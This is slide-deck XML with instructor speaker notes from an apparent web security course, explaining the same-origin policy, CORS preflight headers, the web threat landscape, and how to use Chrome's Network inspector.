                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Point out that, in the first two rows, both URLs have the same protocol, domain, and port as the base URL. The path to the requested file is different, but this is allowed by the same origin policy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Point out that, in the others, one of the other pieces of information is different, which violates the same origin policy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>This means that a user who loads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://store.company.com/dir/page.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> request resources from the first two URLs—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> the last ones.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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724733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5"/>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3477680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200" dirty="0"/>
              <a:t>Explain that preflight CORS requests can use three headers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, which specifies the origin of the request</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Request-Method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, which describes which method the client wants to use</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Request-Headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, which describes custom headers the client wants to use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" b="0" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Explain that browsers use these headers to ask which methods and headers servers will understand with CORS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" b="0" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Explain that responses to preflight requests can also use three headers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, which describes the origins allowed to make CORS requests</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Methods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, which describes the methods those domains are allowed to use </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, which describes the custom headers servers will understand in CORS requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" b="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564251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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> request header and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Access-Control-Allow-Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> response header in this simple CORS exchange.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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775349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2200" dirty="0"/>
              <a:t>Preflight requests use three headers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Request-Method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Request-Headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Responses use</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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696719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Explain the values of the highlighted headers.</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Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Explain that these headers are being covered now because they’ll appear in the next exercise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F4EE911A-504C-45E1-9DD1-A7318D673F80}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2229557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Pause for questions.</a:t>
            </a:r>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a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="195920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another characteristic of the web that makes it “special” is the fact that it accounts for a considerable proportion of the modern threat landscape.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Point out that all attack surfaces under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Expanding Attack Surface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> in the top-left are broadened by the web: The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> connects </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> and their </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Mobile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>IoT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Devices to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, where they are more easily exposed to the threat actors in the row just below (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Motivated and Well-Funded Threat Actors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>In addition, emphasize that many of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Creative and Sophisticated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> attacks enumerated in the bottom-left are delivered through the web: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Spear-Phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Custom Malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Social Engineering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> are all commonly executed via the Internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Finally, while obvious, it’s worth pointing out that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Well-Established Cyber-Crime Economy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t> is largely run through the darknet, or the section of the Internet not indexed by search engines.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>As the web grows, the threats posed by these actors, attacks, and economy do, as well.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0"/>
              <a:t>Emphasize that the growing relevance of these threats is our main motivation for understanding the web as a system and attack surface.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>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9712754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Explain that you’ll next demonstrate how to use Chrome’s Net Inspector to see requests/responses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Let students know that the browser provides **Developer Tools** for inspecting the requests/responses used to load all the resources for a given web page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Explain that these tools allow you to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - View and modify HTML/CSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - Run your own JavaScript on a web page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - Inspect network activity, such as requests/responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - ...And much more!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Let students know that they'll use the developer tools extensively in their time with web applications. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - Today, you'll introduce them to just one tool: The **Network Inspector**.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Open Chrome, and press: `Ctrl + Shift + I` to open the inspector. Point out the following tabs:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - **Elements**, which allows you to inspect HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - **Console**, where you can run JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - **Sources**, which provides information on files used to load the current page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - **Network**, which contains information about requests/responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - **Security**, which provides an overview of the page's security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>    - Note that you may have to click the `&gt;&gt;` arrow on the far-right of the row to find the Security tab.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - The other tabs (**Performance**, etc.) aren't important for our purposes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Click the **Network** tab, then navigate to `https://google.com`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>- Point out that this results in activity in the Networks tab. Explain each column as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - The **Name** column contains the name of the requested file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - The **Status** column contains the HTTP response status code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - The **Type** column specifies the type of the data in the response body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - The **Initiator** column specifies the part of the page, or the JavaScript function, that fired the request for the resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - The **Size** column specifies the size of the file, in bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  - The **Time** column specifies how long it took to fulfill the response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
